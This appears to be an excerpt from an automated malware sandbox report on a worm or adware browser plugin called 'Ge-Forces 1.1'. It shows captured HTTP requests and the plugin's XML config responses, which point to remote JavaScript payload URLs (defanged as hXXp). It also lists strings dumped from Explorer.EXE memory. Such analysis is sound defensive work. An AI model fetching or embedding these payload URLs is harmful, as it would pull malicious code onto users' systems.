Host: js.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713954"
Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
Cache-Control: max-age=895
Content-Length: 1679
Content-Type: text/xml; charset=UTF-8
X-HW: 1421058088.dop005.ny2.t,1421058088.cds005.ny2.c
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>27</Ver>. <ShortName>Ge-Forces 1.1</ShortName>. <Description>Ge-Force</Description>. <PublisherName>iWebar</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>false&
<<< skipped >>>
GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713954"
Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
Cache-Control: max-age=900
Content-Length: 1679
Content-Type: text/xml; charset=UTF-8
X-HW: 1421058083.dop006.ny2.t,1421058083.cds005.ny2.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>27</Ver>. <ShortName>Ge-Forces 1.1</ShortName>. <Description>Ge-Force</Description>. <PublisherName>iWebar</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>false&
<<< skipped >>>
Map
The Worm connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_2032_rwx_00E70000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
Explorer.EXE_2032_rwx_00E80000_00001000:
|explorer.exeM_2032_
|explorer.exeM_2032_